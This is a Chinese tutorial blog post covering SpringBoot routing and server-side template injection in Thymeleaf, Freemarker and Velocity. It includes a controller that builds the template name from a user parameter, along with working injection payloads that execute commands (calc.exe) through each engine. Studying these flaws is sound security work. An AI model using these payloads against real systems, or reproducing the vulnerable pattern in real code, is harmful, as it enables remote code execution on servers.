Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

SuperherRo2025-05-01 13:21

知识点:

1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参

2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、演示案例-WEB开发-JavaEE-开发框架-SpringBoot&路由&传参

类似于php语言中的thinkphp,不过要更加优秀。

参考:https://springdoc.cn/spring-boot/













1、路由映射

bash 复制代码 
@RequestMapping @GetMapping等

2、参数传递

bash 复制代码 
@RequestParam

3、数据响应

bash 复制代码 
@RestController @Controller(请求)
@RestController注解相当于@ResponseBody(响应)+@Controller(请求)合作用。










二、演示案例-WEB开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量



4、新建Controller目录及文件,指定路由配置









5、更换SpringBoot及Thymeleaf版本测试POC

bash 复制代码 
@Controller
public class IndexController {
    @RequestMapping("/index")
    public String index(Model model) {
//替换模版html文件中的data变量值
model.addAttribute("data", "你好 小迪");
//使用index模版文件
        return "index";
    }




bash 复制代码 
    @RequestMapping("/indexs")
    public String index(Model model,@RequestParam String lang) {
//替换模版html文件中的data变量值
model.addAttribute("data", "Hello xiaodi");
//使用index+变量lang模版文件
        return "index-"+lang;
    }
}



bash 复制代码 
利用条件:Thymeleaf漏洞版本,可控渲染模版文件
Poc:__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x





Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量


4、新建Controller目录及文件,指定路由配置






5、更换SpringBoot及Freemarker版本测试POC

bash 复制代码 
 <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}





bash 复制代码 
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

利用条件:可控渲染的模版文件

Velocity


参考:https://blog.csdn.net/2401_83799022/article/details/141600988

bash 复制代码 
<dependency>
    <groupId>org.apache.velocity</groupId>
    <artifactId>velocity</artifactId>
    <version>1.7</version>
</dependency>



bash 复制代码 
Poc:%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")
bash 复制代码 
利用条件:Velocity漏洞版本,可控模版变量或文件


相关推荐
angushine8 分钟前
SpringBoot多工程项目微服务install时如何不安装到本地仓库
spring boot·后端·微服务
❀͜͡傀儡师15 分钟前
基于Spring Boot 3.0、ShardingSphere、PostgreSQL或达梦数据库的分库分表
数据库·spring boot·postgresql
Alsn861 小时前
11.Spring Boot 3.1.5 中使用 SpringDoc OpenAPI(替代 Swagger)生成 API 文档
java·spring boot·后端
猎人everest2 小时前
Spring Boot集成Spring Cloud 2024(不使用Feign)
java·spring boot·spring cloud
药尘师3 小时前
低版的spring boot 1.X接入knife4j
java·spring boot·后端
科技万象7 小时前
SpringBoot终极形态:AI生成带OAuth2鉴权的微服务模块(节省20人日)
人工智能·spring boot·微服务
Alsn867 小时前
9.idea中创建springboot项目_jdk1.8
java·spring boot·intellij-idea
计算机毕设定制辅导-无忧学长7 小时前
Spring Boot 集成 ActiveMQ 实现异步消息通信(二)
spring boot·activemq·java-activemq
weixin_456588157 小时前
【Spring Boot 注解】@ConfigurationProperties
spring boot·后端
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03西电B测-计算机网络综合实验(含验收问题)04YOLOv8目标检测在RK3588部署全过程05Coze扣子平台完整体验和实践(附国内和国际版对比)06DeepSeek各版本说明与优缺点分析07YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09我决定放弃搞 Java 了10【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!